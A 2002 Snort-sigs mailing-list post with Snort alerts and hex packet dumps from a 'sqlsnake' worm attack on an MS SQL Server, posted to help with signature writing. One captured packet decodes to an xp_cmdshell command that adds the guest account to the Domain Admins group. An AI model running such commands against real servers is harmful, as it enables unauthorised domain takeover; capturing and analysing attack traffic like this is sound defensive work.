[Snort-sigs] sqlsnake packet trace

Robert Wagner rwagner at ...447...
Tue May 21 12:11:09 EDT 2002


Here is the initial SQL server attack.  It then tries to open a connection
on 445.


[**] SQL scan [**]
05/21-14:10:56.470487 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6843 IpLen:20 DgmLen:48 DF
******S* Seq: 0x13D81BCB  Ack: 0x0  Win: 0x4000  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK 
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 00 30 1A BB 40 00 72 06 56 9E 0C FB 1B 41 xx xx  .0.. at ...601...,
0x0020: xx xx 0B 44 05 99 13 D8 1B CB 00 00 00 00 70 02  ...D..........p.
0x0030: 40 00 6B 30 00 00 02 04 05 B4 01 01 04 02        @.k0..........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] SQL scan [**]
05/21-14:10:56.498357 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6844 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x13D81BCC  Ack: 0x910004FC  Win: 0x4470  TcpLen: 20
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 00 28 1A BC 40 00 72 06 56 A5 0C FB 1B 41 xx xx  .(.. at ...601...,
0x0020: xx xx 0B 44 05 99 13 D8 1B CC 91 00 04 FC 50 10  ...D..........P.
0x0030: 44 70 FD 77 00 00 00 00 00 00 00 00              Dp.w........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] SQL scan [**]
05/21-14:10:56.520779 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6845 IpLen:20 DgmLen:305 DF
***AP*** Seq: 0x13D81BCC  Ack: 0x910004FC  Win: 0x4470  TcpLen: 20
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 01 31 1A BD 40 00 72 06 55 9B 0C FB 1B 41 xx xx  .1.. at ...602...,
0x0020: xx xx 0B 44 05 99 13 D8 1B CC 91 00 04 FC 50 18  ...D..........P.
0x0030: 44 70 4F F6 00 00 10 01 01 09 00 00 01 00 01 01  DpO.............
0x0040: 00 00 00 00 00 70 00 10 00 00 00 00 00 06 40 0E  .....p........ at ...180...
0x0050: 00 00 00 00 00 00 E0 03 10 00 68 01 00 00 09 04  ..........h.....
0x0060: 00 00 56 00 0A 00 6A 00 02 00 00 00 00 00 6E 00  ..V...j.......n.
0x0070: 21 00 B0 00 0C 00 00 00 00 00 C8 00 05 00 D2 00  !...............
0x0080: 00 00 D2 00 00 00 00 02 E3 1D FA 2D D2 00 2F 00  ...........-../.
0x0090: 01 01 00 00 46 00 49 00 4C 00 45 00 53 00 45 00  ....F.I.L.E.S.E.
0x00A0: 52 00 56 00 45 00 52 00 73 00 61 00 4D 00 69 00  R.V.E.R.s.a.M.i.
0x00B0: 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00  c.r.o.s.o.f.t. .
0x00C0: 28 00 72 00 29 00 20 00 57 00 69 00 6E 00 64 00  (.r.). .W.i.n.d.
0x00D0: 6F 00 77 00 73 00 20 00 53 00 63 00 72 00 69 00  o.w.s. .S.c.r.i.
0x00E0: 70 00 74 00 20 00 48 00 6F 00 73 00 74 00 32 00  p.t. .H.o.s.t.2.
0x00F0: 30 00 38 00 2E 00 34 00 34 00 2E 00 31 00 35 00  0.8...4.4...1.5.
0x0100: 39 00 2E 00 36 00 4F 00 4C 00 45 00 44 00 42 00  9...6.O.L.E.D.B.
0x0110: 4E 54 4C 4D 53 53 50 00 01 00 00 00 07 B2 00 A0  NTLMSSP.........
0x0120: 05 00 05 00 2A 00 00 00 0A 00 0A 00 20 00 00 00  ....*....... ...
0x0130: 46 49 4C 45 53 45 52 56 45 52 46 49 45 52 4F     FILESERVERFIERO

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] SQL scan [**]
05/21-14:10:56.609891 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6846 IpLen:20 DgmLen:158 DF
***AP*** Seq: 0x13D81CD5  Ack: 0x91000690  Win: 0x42DC  TcpLen: 20
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 00 9E 1A BE 40 00 72 06 56 2D 0C FB 1B 41 xx xx  .... at ...603...,
0x0020: xx xx 0B 44 05 99 13 D8 1C D5 91 00 06 90 50 18  ...D..........P.
0x0030: 42 DC A7 66 00 00 01 01 00 76 00 00 01 00 65 00  B..f.....v....e.
0x0040: 78 00 65 00 63 00 20 00 78 00 70 00 5F 00 63 00  x.e.c. .x.p._.c.
0x0050: 6D 00 64 00 73 00 68 00 65 00 6C 00 6C 00 20 00  m.d.s.h.e.l.l. .
0x0060: 27 00 6E 00 65 00 74 00 20 00 67 00 72 00 6F 00  '.n.e.t. .g.r.o.
0x0070: 75 00 70 00 20 00 22 00 44 00 6F 00 6D 00 61 00  u.p. .".D.o.m.a.
0x0080: 69 00 6E 00 20 00 41 00 64 00 6D 00 69 00 6E 00  i.n. .A.d.m.i.n.
0x0090: 73 00 22 00 20 00 67 00 75 00 65 00 73 00 74 00  s.". .g.u.e.s.t.
0x00A0: 20 00 2F 00 61 00 64 00 64 00 27 00               ./.a.d.d.'.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] SQL scan [**]
05/21-14:10:56.734529 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6847 IpLen:20 DgmLen:40 DF
***A***F Seq: 0x13D81D4B  Ack: 0x910007C1  Win: 0x41AB  TcpLen: 20
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 00 28 1A BF 40 00 72 06 56 A2 0C FB 1B 41 xx xx  .(.. at ...601...,
0x0020: xx xx 0B 44 05 99 13 D8 1D 4B 91 00 07 C1 50 11  ...D.....K....P.
0x0030: 41 AB FB F7 00 00 00 00 00 00 00 00              A...........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] SQL scan [**]
05/21-14:10:56.761800 12.251.27.65:2884 -> myip:1433
TCP TTL:114 TOS:0x0 ID:6848 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x13D81D4C  Ack: 0x910007C2  Win: 0x41AB  TcpLen: 20
0x0000: 00 xx xx xx xx xx xx xx xx xx xx xx xx 00 45 00  .P...i..c.....E.
0x0010: 00 28 1A C0 40 00 72 06 56 A1 0C FB 1B 41 xx xx  .(.. at ...601...,
0x0020: xx xx 0B 44 05 99 13 D8 1D 4C 91 00 07 C2 50 10  ...D.....L....P.
0x0030: 41 AB FB F6 00 00 00 00 00 00 00 00              A...........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+





More information about the Snort-sigs mailing list